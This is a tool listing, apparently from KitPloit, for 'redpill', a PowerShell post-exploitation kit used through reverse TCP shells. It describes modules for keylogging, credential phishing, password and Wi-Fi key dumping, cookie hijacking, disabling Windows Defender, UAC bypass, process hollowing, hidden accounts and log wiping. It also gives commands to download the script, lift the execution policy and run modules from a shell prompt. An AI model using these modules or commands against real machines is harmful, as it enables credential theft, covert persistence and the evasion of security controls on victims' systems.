Redpill - Assist Reverse Tcp Shells In Post-Exploration Tasks

2021-06-14T12:30:00
ID KITPLOIT:97003539315531987
Type kitploit
Reporter KitPloit
Modified 2021-06-14T12:30:00

Description

Project Description

The redpill project aims to assist reverse tcp shells in post-exploration tasks. Often in redteam engagements we
need to use unconventional ways to access target system, such as reverse tcp shells ( _ not metasploit _ ) in order
to bypass the defenses implemented by the system administrator. After the first stage was successful compleated
we face another type of problems: _ "I have (shell) access to the target system, and now what can I do with it?" _

This project consists of several PowerShell scripts that perform different _ post-exploitation _ functions and the
main script _ redpill.ps1 _ that is main work its to download/config/exe the scripts contained in this repository.

The goal is to have a similar meterpreter experience in our reverse tcp shell prompt (meterpreter similar options)

Folder Name | Description | Notes
---|---|---
Bin | Contains redpill main modules | Sysinfo | GetConnections | Persiste | Keylogger | etc.
Bypass | Contains redpill bypass scripts | Manual Download/Execution required
modules | Contains redpill modules | Sherlock | CredsPhish | Webserver | StartWebServer | etc.
Utils | Contains BAT | PS1 scripts | Manual execution required

CmdLet Parameters syntax\examples

post-exploitation module. venom amsi evasion agents automatically uploads this CmdLet to %TMP% directory to be easily accessible in our reverse tcp shell ( shell prompt ). ">

 This cmdlet belongs to the structure of venom v1.0.17.8 as a post-exploitation module.  
 venom amsi evasion agents automatically uploads this CmdLet to %TMP% directory to be  
 easily accessible in our reverse tcp shell ( shell prompt ).

_ To List All Parameters Available, execute in powershell prompt: _

.\redpill.ps1 -Help Parameters

CmdLet Parameter Name | Parameter Arguments | Description
---|---|---
-SysInfo | Enum | Verbose | Quick System Info OR Verbose Enumeration
-GetConnections | Enum | Verbose | Enumerate Remote Host Active TCP Connections
-GetDnsCache | Enum | Clear | Enumerate\Clear remote host DNS cache entrys
-GetInstalled | Enum | Enumerate Remote Host Applications Installed
-GetProcess | Enum | Kill | Tokens | Enumerate OR Kill Remote Host Running Process(s)
-GetTasks | Enum | Create | Delete | Enumerate\Create\Delete Remote Host Running Tasks
-GetLogs | Enum | Verbose | Clear | Enumerate eventvwr logs OR Clear All event logs
-GetBrowsers | Enum | Verbose | Creds | Enumerate Installed Browsers and Versions OR Verbose
-Screenshot | 1 | Capture 1 Desktop Screenshot and Store it on %TMP%
-Camera | Enum | Snap | Enum computer webcams OR capture default webcam snapshot
-StartWebServer | Python | Powershell | Downloads webserver to %TMP% and executes the WebServer
-Keylogger | Start | Stop | Start OR Stop recording remote host keystrokes
-MouseLogger | Start | Capture Screenshots of Mouse Clicks for 10 seconds
-PhishCreds | Start | Brute | Promp current user for a valid credential and leak captures
-GetPasswords | Enum | Dump | Enumerate passwords of diferent locations {Store|Regedit|Disk}
-WifiPasswords | Dump | ZipDump | Enum Available SSIDs OR ZipDump All Wifi passwords
-EOP | Enum | Verbose | Find Missing Software Patchs for Privilege Escalation
-ADS | Enum | Create | Exec | Clear | Hidde scripts { bat | ps1 | exe } on $DATA records (ADS)
-BruteZip | $Env:TMP\archive.zip | Brute force sellected Zip archive with the help of 7z.exe
-Upload | script.ps1 | Upload script.ps1 from attacker apache2 webroot
-Persiste | $Env:TMP\Script.ps1 | Persiste script.ps1 on every startup {BeaconHome}
-CleanTracks | Clear | Paranoid | Clean disk artifacts left behind {clean system tracks}
-AppLocker | Enum | WhoAmi | TestBat | Enumerate AppLocker Directorys with weak permissions
-FileMace | $Env:TMP\test.txt | Change File Mace {CreationTime,LastAccessTime,LastWriteTime}
-MetaData | $Env:TMP\test.exe | Display files \ applications description (metadata)
-PEHollow | GetSystem | $Env:TMP\test.exe | Process Hollowing {impersonate explorer.exe as parent}
-MsgBox | "Hello World." | Spawns "Hello World." msgBox on local host {wscriptComObject}
-SpeakPrank | "Hello World." | Make remote host speak user input sentence {prank}
-NetTrace | Enum | Agressive Enumeration with the help of netsh {native}
-PingSweep | Enum | Verbose | Enumerate Active IP Address and open ports on Local Lan
-DnsSpoof | Enum | Redirect | Clear | Redirect Domain Names to our Phishing IP address
-DisableAV | Query | Start | Stop | Disable Windows Defender Service (WinDefend)
-HiddenUser | Query | Create | Delete | Query \ Create \ Delete Hidden User Accounts
-CsOnTheFly | Compile | Execute | Download \ Compile (to exe) and Execute CS scripts
-CookieHijack | Dump|History | Edge|Chrome Cookie Hijacking tool
-UacMe | Bypass | Elevate | Clean | UAC bypass|EOP by dll reflection! (cmstp.exe)

_ To Display Detailed information about each parameter execute: _

Syntax : .\redpill.ps1 -Help [ -Parameter Name ]  
Example: .\redpill.ps1 -Help WifiPasswords

Instructions how to use the Cmdlet { _ Local tests _ }

 This cmdlet belongs to the structure of venom v1.0.17.8 as a post-exploitation module.  
 venom amsi evasion agents automatically uploads this CmdLet to %TMP% directory to be  
 easily accessible in our reverse tcp shell ( shell ).

 'this section describes how to test this Cmdlet Locally without exploiting target host'

1º - Download CmdLet from GitHub repository to _ 'Local Disk' _

iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1

2º - Set Powershell Execution Policy to _ 'UnRestricted' _

Set-ExecutionPolicy UnRestricted -Scope CurrentUser

3º - Browse to _ 'redpill.ps1' _ storage directory

cd C:\Users\pedro\Desktop

4º - Access CmdLet Help Menu {All Parameters}

.\redpill.ps1 -Help Parameters

5º - Access _ [ -WifiPasswords ] _ Detailed Parameder Help

Syntax : .\redpill.ps1 -Help [ -Parameter Name ]  
Example: .\redpill.ps1 -Help WifiPasswords

6º - Running _ [ -WifiPasswords ] [ Dump ] _ Module

Syntax : .\redpill.ps1 [ -Parameter Name ] [ @argument ]  
Example: .\redpill.ps1 -WifiPasswords Dump

7º - Running _ [ -sysinfo ] [ Enum ] _ Module

Syntax : .\redpill.ps1 [ -Parameter Name ] [ @argument ]  
Example: .\redpill.ps1 -sysinfo Enum

Instructions how to use the CmdLet under _ Venon v1.0.17.8 _

 This cmdlet belongs to the structure of venom v1.0.17.8 as a post-exploitation module.  
 venom amsi evasion agents automatically uploads this CmdLet to %TMP% directory to be  
 easily accessible in our reverse tcp shell ( shell prompt ).

1º - execute in reverse tcp shell prompt

[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -Help Parameters

2º - Access _ [ -WifiPasswords ] _ Detailed Parameter Help

[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -Help WifiPasswords

3º - Running _ [ -WifiPasswords ] [ Dump ] _ Module

[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -WifiPasswords Dump

To Manual download the CmdLet for Local Tests, execute:

iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1

Video Tutorials

Demonstration - This tutorial uses: sysinfo, GetPasswords, UacMe modules
MouseLogger - Capture Screenshots of 'MouseClicks' with the help of psr.exe
PhishCreds - Phish for login credentials OR Brute Force user account password
FileMace - Change File TimeStamp {CreationTime, LastAccessTime, LastWriteTime}
CsOnTheFly - Download (from url), Auto-Compile and Execute CS scripts On-The-Fly!
EOP - Find missing software patchs for privilege escalation

Acknowledgments
hax0r | Function | OS Flavor
---|---|---
_ @youhacker55 _ | For All the help Debugging this cmdlet (Testing BETA version) | Windows 7 x64bits
_ @0xyg3n _ | For All the help Debugging this cmdlet (Testing BETA version) | Windows 10 x64bits
_ @Shanty_Damayanti _ | Debugging this cmdlet (amsi string detection bypasses) | Windows 10 x64bits
_ @miltinhoc _ | Debugging this cmdlet and recording video tutorials | Windows 10 x64bits

Any collaborations Or bugreports are wellcome

SuspiciousShellActivity - RedTeam @2021

Download Redpill